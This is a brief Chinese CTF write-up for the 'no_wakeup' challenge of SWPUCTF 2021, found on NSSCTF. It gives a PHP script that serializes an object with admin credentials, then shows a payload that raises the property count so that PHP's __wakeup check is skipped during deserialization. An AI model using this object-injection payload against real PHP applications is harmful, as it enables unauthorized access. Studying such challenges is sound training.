NSS [SWPUCTF 2021 新生赛]no_wakeup
先看题目,反序列化,绕过weakup。
exp:
<?php
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd = "wllm";
}
}
$j17 = new HaHaHa();
echo serialize($j17);
?>
O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";} 改成
O:6:"HaHaHa":【3】:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}